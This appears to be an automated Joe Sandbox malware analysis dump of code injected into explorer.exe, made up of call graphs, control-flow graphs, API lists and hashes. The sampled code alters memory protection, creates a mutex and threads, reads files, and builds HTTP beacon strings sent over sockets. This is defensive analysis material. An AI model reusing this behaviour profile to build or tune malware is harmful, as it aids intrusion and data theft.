13571 b408cb5 CreateMutexW 13570->13571 13571->13569 13574 b410adf 13572->13574 13573 b410ebc 13582 b409de2 13573->13582 13574->13573 13644 b4068f2 13574->13644 13576 b410e5c 13577 b4068f2 NtProtectVirtualMemory 13576->13577 13578 b410e7c 13577->13578 13579 b4068f2 NtProtectVirtualMemory 13578->13579 13580 b410e9c 13579->13580 13581 b4068f2 NtProtectVirtualMemory 13580->13581 13581->13573 13583 b409df0 13582->13583 13585 b409ecd 13583->13585 13667 b40d382 13583->13667 13586 b406412 13585->13586 13588 b406440 13586->13588 13587 b406473 13587->13567 13588->13587 13589 b40644d CreateThread 13588->13589 13589->13567 13592 b409f06 13590->13592 13591 b409fa4 13591->13567 13592->13591 13593 b4068f2 NtProtectVirtualMemory 13592->13593 13594 b409f9c 13593->13594 13595 b40d382 ObtainUserAgentString 13594->13595 13595->13591 13598 b40a016 13596->13598 13597 b40a0f0 13597->13567 13598->13597 13601 b40a0bb 13598->13601 13602 b4068f2 NtProtectVirtualMemory 13598->13602 13599 b40a0e8 13600 b40d382 ObtainUserAgentString 13599->13600 13600->13597 13601->13599 13603 b4068f2 NtProtectVirtualMemory 13601->13603 13602->13601 13603->13599 13606 b40a137 13604->13606 13605 b40a2d5 13605->13567 13606->13605 13607 b4068f2 NtProtectVirtualMemory 13606->13607 13608 b40a28a 13607->13608 13609 b4068f2 NtProtectVirtualMemory 13608->13609 13612 b40a2a9 13609->13612 13610 b40a2cd 13611 b40d382 ObtainUserAgentString 13610->13611 13611->13605 13612->13610 13613 b4068f2 NtProtectVirtualMemory 13612->13613 13613->13610 13615 b40a349 13614->13615 13616 b40a49f 13615->13616 13618 b4068f2 NtProtectVirtualMemory 13615->13618 13617 b4068f2 NtProtectVirtualMemory 13616->13617 13621 b40a4c3 13616->13621 13617->13621 13619 b40a480 13618->13619 13620 b4068f2 NtProtectVirtualMemory 13619->13620 13620->13616 13622 b4068f2 NtProtectVirtualMemory 13621->13622 13623 b40a597 13621->13623 13622->13623 13624 b4068f2 NtProtectVirtualMemory 13623->13624 13625 b40a5bf 13623->13625 13624->13625 13628 b4068f2 NtProtectVirtualMemory 13625->13628 13629 b40a6b9 13625->13629 13626 b40a6e1 13627 b40d382 ObtainUserAgentString 13626->13627 13630 b40a6e9 13627->13630 13628->13629 13629->13626 13631 b4068f2 NtProtectVirtualMemory 13629->13631 13630->13567 13631->13626 13633 b40a767 13632->13633 13634 b4068f2 NtProtectVirtualMemory 13633->13634 13639 b40a903 13633->13639 13635 b40a8e3 13634->13635 13636 b4068f2 NtProtectVirtualMemory 13635->13636 13636->13639 13637 b40a9b7 13638 b40d382 ObtainUserAgentString 13637->13638 13640 b40a9bf 13638->13640 13641 b4068f2 NtProtectVirtualMemory 13639->13641 13642 b40a992 13639->13642 13640->13567 13641->13642 13642->13637 13643 b4068f2 NtProtectVirtualMemory 13642->13643 13643->13637 13645 b406987 13644->13645 13648 b4069b2 13645->13648 13659 b407622 13645->13659 13647 b406c0c 13647->13576 13648->13647 13649 b406ba2 13648->13649 13652 b406ac5 13648->13652 13650 b412e12 NtProtectVirtualMemory 13649->13650 13651 b406b5b 13650->13651 13651->13647 13654 b412e12 NtProtectVirtualMemory 13651->13654 13663 b412e12 13652->13663 13654->13647 13655 b406ae3 13655->13647 13656 b406b3d 13655->13656 13657 b412e12 NtProtectVirtualMemory 13655->13657 13658 b412e12 NtProtectVirtualMemory 13656->13658 13657->13656 13658->13651 13660 b40767a 13659->13660 13661 b412e12 NtProtectVirtualMemory 13660->13661 13662 b407684 13660->13662 13661->13660 13662->13648 13664 b412e45 NtProtectVirtualMemory 13663->13664 13665 b411942 13663->13665 13666 b412e70 13664->13666 13665->13664 13666->13655 13668 b40d3c7 13667->13668 13671 b40d232 13668->13671 13670 b40d438 13670->13585 13672 b40d25e 13671->13672 13675 b40c8c2 13672->13675 13674 b40d26b 13674->13670 13677 b40c934 13675->13677 13676 b40c9a6 13676->13674 13677->13676 13678 b40c995 ObtainUserAgentString 13677->13678 13678->13676 13803 b40e72e 13804 b40e788 connect 13803->13804 13805 b40e76a 13803->13805 13805->13804 13894 b40742e 13895 b40745b 13894->13895 13903 b4074c9 13894->13903 13896 b411232 2 API calls 13895->13896 13895->13903 13897 b407496 13896->13897 13898 b4074c5 13897->13898 13900 b407082 2 API calls 13897->13900 13899 b411232 2 API calls 13898->13899 13898->13903 13899->13903 13901 b4074b6 13900->13901 13901->13898 13902 b406f52 2 API calls 13901->13902 13902->13898 13810 b4139f1 13811 b4139f7 13810->13811 13814 b408852 13811->13814 13813 b413a0f 13815 b4088e4 13814->13815 13816 b408865 13814->13816 13815->13813 13816->13815 13817 b40887e 13816->13817 13819 b408887 13816->13819 13818 b40e36f 13817->13818 13833 b40e0c2 13817->13833 13818->13813 13819->13815 13822 b40c662 13819->13822 13823 b40c66b 13822->13823 13829 b40c7ba 13822->13829 13824 b4060f2 7 API calls 13823->13824 13823->13829 13825 b40c6ee 13824->13825 13826 b40c750 13825->13826 13827 b411f82 7 API calls 13825->13827 13828 b40c83f 13826->13828 13826->13829 13830 b40c791 13826->13830 13827->13826 13828->13829 13831 b411f82 7 API calls 13828->13831 13829->13815 13830->13829 13832 b411f82 7 API calls 13830->13832 13831->13829 13832->13829 13834 b40e1f0 13833->13834 13835 b40e0cb 13833->13835 13834->13818 13835->13834 13836 b411f82 7 API calls 13835->13836 13836->13834 13837 b4075f1 13838 b407606 13837->13838 13839 b40760e 13837->13839 13840 b40c662 7 API calls 13838->13840 13840->13839 13948 b4060f1 13949 b406109 13948->13949 13950 b4061d3 13948->13950 13951 b406012 7 API calls 13949->13951 13952 b406113 13951->13952 13952->13950 13953 b411f82 7 API calls 13952->13953 13953->13950 13841 b4139b3 13842 b4139bd 13841->13842 13845 b4086d2 13842->13845 13844 b4139e0 13846 b408704 13845->13846 13847 b4086f7 13845->13847 13849 b40872d 13846->13849 13851 b408737 13846->13851 13853 b4086ff 13846->13853 13848 b4060f2 7 API calls 13847->13848 13848->13853 13854 b40e2c2 13849->13854 13852 b411f82 7 API calls 13851->13852 13851->13853 13852->13853 13853->13844 13855 b40e2cb 13854->13855 13856 b40e2df 13854->13856 13855->13856 13857 b40e0c2 7 API calls 13855->13857 13856->13853 13857->13856 13527 b411232 13528 b41125c 13527->13528 13532 b411334 13527->13532 13529 b411410 NtCreateFile 13528->13529 13528->13532 13530 b41145d 13529->13530 13531 b4115e9 NtReadFile 13530->13531 13530->13532 13531->13532 13954 b40a2f4 13955 b40a349 13954->13955 13956 b40a49f 13955->13956 13958 b4068f2 NtProtectVirtualMemory 13955->13958 13957 b4068f2 NtProtectVirtualMemory 13956->13957 13961 b40a4c3 13956->13961 13957->13961 13959 b40a480 13958->13959 13960 b4068f2 NtProtectVirtualMemory 13959->13960 13960->13956 13962 b4068f2 NtProtectVirtualMemory 13961->13962 13963 b40a597 13961->13963 13962->13963 13964 b4068f2 NtProtectVirtualMemory 13963->13964 13965 b40a5bf 13963->13965 13964->13965 13968 b4068f2 NtProtectVirtualMemory 13965->13968 13969 b40a6b9 13965->13969 13966 b40a6e1 13967 b40d382 ObtainUserAgentString 13966->13967 13970 b40a6e9 13967->13970 13968->13969 13969->13966 13971 b4068f2 NtProtectVirtualMemory 13969->13971 13971->13966 13990 b40e0b9 13991 b40e0ed 13990->13991 13993 b40e1f0 13990->13993 13992 b411f82 7 API calls 13991->13992 13991->13993 13992->13993 13785 b411f7a 13786 b411fb8 13785->13786 13787 b40e5b2 socket 13786->13787 13789 b412081 13786->13789 13792 b412022 13786->13792 13787->13789 13788 b412134 13790 b40e732 connect 13788->13790 13788->13792 13793 b4121b2 13788->13793 13789->13788 13791 b412117 getaddrinfo 13789->13791 13789->13792 13790->13793 13791->13788 13793->13792 13794 b40e6b2 send 13793->13794 13795 b412729 13794->13795 13796 b412756 SleepEx 13795->13796 13798 b41275d 13795->13798 13796->13798 13797 b4127f4 setsockopt recv 13797->13792 13798->13792 13798->13797 13904 b41083a 13905 b410841 13904->13905 13906 b411f82 7 API calls 13905->13906 13907 b4108c5 13906->13907 13908 b410906 13907->13908 13909 b411232 2 API calls 13907->13909 13909->13908 13972 b40a0fb 13974 b40a137 13972->13974 13973 b40a2d5 13974->13973 13975 b4068f2 NtProtectVirtualMemory 13974->13975 13976 b40a28a 13975->13976 13977 b4068f2 NtProtectVirtualMemory 13976->13977 13980 b40a2a9 13977->13980 13978 b40a2cd 13979 b40d382 ObtainUserAgentString 13978->13979 13979->13973 13980->13978 13981 b4068f2 NtProtectVirtualMemory 13980->13981 13981->13978 13994 b40c8be 13996 b40c8c3 13994->13996 13995 b40c9a6 13996->13995 13997 b40c995 ObtainUserAgentString 13996->13997 13997->13995 13858 b409fbf 13861 b40a016 13858->13861 13859 b40a0f0 13860 b40a0e8 13862 b40d382 ObtainUserAgentString 13860->13862 13861->13859 13863 b40a0bb 13861->13863 13864 b4068f2 NtProtectVirtualMemory 13861->13864 13862->13859 13863->13860 13865 b4068f2 NtProtectVirtualMemory 13863->13865 13864->13863 13865->13860

                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                  Function 0B411F82 Relevance: 25.3, APIs: 4, Strings: 10, Instructions: 815networkCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 0 b411f82-b411fb6 1 b411fd6-b411fd9 0->1 2 b411fb8-b411fbc 0->2 3 b411fdf-b411fed 1->3 4 b4128fe-b41290c 1->4 2->1 5 b411fbe-b411fc2 2->5 6 b411ff3-b411ff7 3->6 7 b4128f6-b4128f7 3->7 5->1 8 b411fc4-b411fc8 5->8 10 b411ff9-b411ffd 6->10 11 b411fff-b412000 6->11 7->4 8->1 9 b411fca-b411fce 8->9 9->1 12 b411fd0-b411fd4 9->12 10->11 13 b41200a-b412010 10->13 11->13 12->1 12->3 14 b412012-b412020 13->14 15 b41203a-b412060 13->15 14->15 18 b412022-b412026 14->18 16 b412062-b412066 15->16 17 b412068-b41207c call b40e5b2 15->17 16->17 19 b4120a8-b4120ab 16->19 22 b412081-b4120a2 17->22 18->7 21 b41202c-b412035 18->21 23 b4120b1-b4120b8 19->23 24 b412144-b412150 19->24 21->7 22->19 26 b4128ee-b4128ef 22->26 27 b4120e2-b4120f5 23->27 28 b4120ba-b4120dc call b411942 23->28 25 b412156-b412165 24->25 24->26 29 b412167-b412178 call b40e552 25->29 30 b41217f-b41218f 25->30 26->7 27->26 32 b4120fb-b412101 27->32 28->27 29->30 34 b412191-b4121ad call b40e732 30->34 35 b4121e5-b41221b 30->35 32->26 37 b412107-b412109 32->37 43 b4121b2-b4121da 34->43 40 b41222d-b412231 35->40 41 b41221d-b41222b 35->41 37->26 42 b41210f-b412111 37->42 45 b412233-b412245 40->45 46 b412247-b41224b 40->46 44 b41227f-b412280 41->44 42->26 47 b412117-b412132 getaddrinfo 42->47 43->35 49 b4121dc-b4121e1 43->49 48 b412283-b4122e0 call b412d62 call b40f482 call b40ee72 call b413002 44->48 45->44 50 b412261-b412265 46->50 51 b41224d-b41225f 46->51 47->24 52 b412134-b41213c 47->52 63 b4122e2-b4122e6 48->63 64 b4122f4-b412354 call b412d92 48->64 49->35 53 b412267-b41226b 50->53 54 b41226d-b412279 50->54 51->44 52->24 53->48 53->54 54->44 63->64 66 b4122e8-b4122ef call b40f042 63->66 69 b41235a-b412396 call b412d62 call b413262 call b413002 64->69 70 b41248c-b4124b8 call b412d62 call b413262 64->70 66->64 85 b412398-b4123b7 call b413262 call b413002 69->85 86 b4123bb-b4123e9 call b413262 * 2 69->86 79 b4124d9-b412590 call b413262 * 3 call b413002 * 2 call b40f482 70->79 80 b4124ba-b4124d5 70->80 111 b412595-b4125b9 call b413262 79->111 80->79 85->86 100 b412415-b41241d 86->100 101 b4123eb-b412410 call b413002 call b413262 86->101 105 b412442-b412448 100->105 106 b41241f-b412425 100->106 101->100 105->111 112 b41244e-b412456 105->112 109 b412467-b412487 call b413262 106->109 110 b412427-b41243d 106->110 109->111 110->111 121 b4125d1-b4126ad call b413262 * 7 call b413002 call b412d62 call b413002 call b40ee72 call b40f042 111->121 122 b4125bb-b4125cc call b413262 call b413002 111->122 112->111 116 b41245c-b41245d 112->116 116->109 133 b4126af-b4126b3 121->133 122->133 135 b4126b5-b4126fa call b40e382 call b40e7b2 133->135 136 b4126ff-b41272d call b40e6b2 133->136 158 b4128e6-b4128e7 135->158 143 b41275d-b412761 136->143 144 b41272f-b412735 136->144 148 b412767-b41276b 143->148 149 b41290d-b412913 143->149 144->143 147 b412737-b41274c 144->147 147->143 152 b41274e-b412754 147->152 155 b412771-b412773 148->155 156 b4128aa-b4128df call b40e7b2 148->156 153 b412779-b412784 149->153 154 b412919-b412920 149->154 152->143 159 b412756-b41275b SleepEx 152->159 160 b412786-b412793 153->160 161 b412795-b412796 153->161 154->160 155->153 155->156 156->158 158->26 159->143 160->161 164 b41279c-b4127a0 160->164 161->164 167 b4127b1-b4127b2 164->167 168 b4127a2-b4127af 164->168 170 b4127b8-b4127c4 167->170 168->167 168->170 172 b4127f4-b412861 setsockopt recv 170->172 173 b4127c6-b4127ef call b412d92 call b412d62 170->173 175 b4128a3-b4128a4 172->175 176 b412863 172->176 173->172 175->156 176->175 181 b412865-b41286a 176->181 181->175 184 b41286c-b412872 181->184 184->175 186 b412874-b4128a1 184->186 186->175 186->176
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Sleepgetaddrinforecvsetsockopt
                                                                                                                                                                                                                                                                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                                                                                                                                  • API String ID: 1843418094-1117930895
                                                                                                                                                                                                                                                                  • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                                                                                                  • Instruction ID: 8b9393cafef8be9425489851a46a606dd816515158ff4e89f39f22392a49c674
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31527230A14B088FCB69EF68C4957EAB7E1FB54300F504A2EC4AFD7246DE74A645CB45
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0B411232 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 293 b411232-b411256 294 b4118bd-b4118cd 293->294 295 b41125c-b411260 293->295 295->294 296 b411266-b4112a0 295->296 297 b4112a2-b4112a6 296->297 298 b4112bf 296->298 297->298 299 b4112a8-b4112ac 297->299 300 b4112c6 298->300 301 b4112b4-b4112b8 299->301 302 b4112ae-b4112b2 299->302 303 b4112cb-b4112cf 300->303 301->303 304 b4112ba-b4112bd 301->304 302->300 305 b4112d1-b4112f7 call b411942 303->305 306 b4112f9-b41130b 303->306 304->303 305->306 310 b411378 305->310 306->310 311 b41130d-b411332 306->311 314 b41137a-b4113a0 310->314 312 b4113a1-b4113a8 311->312 313 b411334-b41133b 311->313 317 b4113d5-b4113dc 312->317 318 b4113aa-b4113d3 call b411942 312->318 315 b411366-b411370 313->315 316 b41133d-b411360 call b411942 313->316 315->310 320 b411372-b411373 315->320 316->315 322 b411410-b41145f NtCreateFile call b411172 317->322 323 b4113de-b41140a call b411942 317->323 318->310 318->317 320->310 322->310 330 b411465-b41146d 322->330 323->310 323->322 330->310 331 b411473-b411476 330->331 332 b411486-b41148d 331->332 333 b411478-b411481 331->333 334 b4114c2-b4114ec 332->334 335 b41148f-b4114b8 call b411942 332->335 333->314 340 b4114f2-b4114f5 334->340 341 b4118ae-b4118b8 334->341 335->310 342 b4114be-b4114bf 335->342 343 b411604-b411611 340->343 344 b4114fb-b4114fe 340->344 341->310 342->334 343->314 345 b411500-b411507 344->345 346 b41155e-b411561 344->346 349 b411509-b411532 call b411942 345->349 350 b411538-b411559 345->350 351 b411567-b411572 346->351 352 b411616-b411619 346->352 349->310 349->350 356 b4115e9-b4115fe NtReadFile 350->356 357 b4115a3-b4115a6 351->357 358 b411574-b41159d call b411942 351->358 354 b4116b8-b4116bb 352->354 355 b41161f-b411626 352->355 359 b411739-b41173c 354->359 360 b4116bd-b4116c4 354->360 362 b411657-b41166b call b412e92 355->362 363 b411628-b411651 call b411942 355->363 356->343 357->310 365 b4115ac-b4115b6 357->365 358->310 358->357 370 b411742-b411749 359->370 371 b4117c4-b4117c7 359->371 367 b4116f5-b411734 360->367 368 b4116c6-b4116ef call b411942 360->368 362->310 385 b411671-b4116b3 362->385 363->310 363->362 365->310 366 b4115bc-b4115e6 365->366 366->356 390 b411894-b4118a9 367->390 368->341 368->367 377 b41174b-b411774 call b411942 370->377 378 b41177a-b4117bf 370->378 371->310 374 b4117cd-b4117d4 371->374 380 b4117d6-b4117f6 call b411942 374->380 381 b4117fc-b411803 374->381 377->341 377->378 378->390 380->381 388 b411805-b411825 call b411942 381->388 389 b41182b-b411835 381->389 385->314 388->389 389->341 394 b411837-b41183e 389->394 390->314 394->341 398 b411840-b411886 394->398 398->390
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CreateRead
                                                                                                                                                                                                                                                                  • String ID: `
                                                                                                                                                                                                                                                                  • API String ID: 3388366904-2679148245
                                                                                                                                                                                                                                                                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                                                                                                  • Instruction ID: 1bcfc0da44961f02bc917b31c8bff9fd20d8a63b194fcea211ae3e0377cd3e8f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56225A70A18A0D9FDB59DF28C4997AAF7F1FB98300F40462EE55EE3650DB30A552CB81
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0B412E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 447 b412e12-b412e38 448 b412e45-b412e6e NtProtectVirtualMemory 447->448 449 b412e40 call b411942 447->449 450 b412e70-b412e7c 448->450 451 b412e7d-b412e8f 448->451 449->448
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 0B412E67
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                                                                                                  • Instruction ID: 7bf8c537180fc05594b3faef2de416cd9bddb0e6da97cfc9a9f874ac314ff053
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D801B530628B484F8784EF6CD481226B7E4FBDD314F000B3EE59AC3250D770C5414742
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0B412E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 452 b412e0a-b412e6e call b411942 NtProtectVirtualMemory 455 b412e70-b412e7c 452->455 456 b412e7d-b412e8f 452->456
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 0B412E67
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                                                                                                                                                  • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                                                                                                                  • Instruction ID: 4ca4a3742eab0268fcfcdc1e443ff1d2422865816a41f03ac2b51a6c2e6911f9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C801A234628B884F8B48EF2C94412A6B3E5FBCE314F000B7EE99AC3240DB61D5028782
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0B40C8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ObtainUserAgentString.URLMON ref: 0B40C9A0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AgentObtainStringUser
                                                                                                                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                                                                                  • API String ID: 2681117516-319646191
                                                                                                                                                                                                                                                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                                                                                                  • Instruction ID: ef636f4c642e457b91d8fd091feacfa79c06251389b870bc37270e5057c6a2a1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D331DF31A14A0C8FCB04EFA9C8857EEBBE4FB58204F40062FD45ED7240DE788649C789
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0B40C8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ObtainUserAgentString.URLMON ref: 0B40C9A0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AgentObtainStringUser
                                                                                                                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                                                                                  • API String ID: 2681117516-319646191
                                                                                                                                                                                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                                                                                  • Instruction ID: 0acdeda31f2cb05b7b7220bf667456dfd422057a8730cd38b6e33e26a363cb01
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF21BD70A10A0C9FCB04EFA9C8857EEBBE4FB58204F40462FD45AD7240DE7486098B89
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0B408B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 232 b408b66-b408b68 233 b408b93-b408bb8 232->233 234 b408b6a-b408b6b 232->234 237 b408bbb-b408bbc 233->237 235 b408b6d-b408b71 234->235 236 b408bbe-b408c22 call b40f612 call b411942 * 2 234->236 235->237 238 b408b73-b408b92 235->238 246 b408c28-b408c2b 236->246 247 b408cdc 236->247 237->236 238->233 246->247 248 b408c31-b408cd3 call b413da4 call b413022 call b4133e2 call b413022 call b4133e2 CreateMutexW 246->248 249 b408cde-b408cf6 247->249 248->247 263 b408cd5-b408cda 248->263 263->249
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_b330000_explorer.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateMutex
                                                                                                                                                                                                                                                                  • String ID: .dll$el32$kern
                                                                                                                                                                                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                                                                                                                                                                                  • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                                                                                                  • Instruction ID: 962823bb2d1dfb743b4432af86eaa77377ec9e83f1ab1666160c79c9ad19b66c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73412D70928A088FDB54EFA8C4D57AD77F0FB98300F04467AD84ADB295DE349A45CB85
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0B408B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2943761942.000000000B330000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B330000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
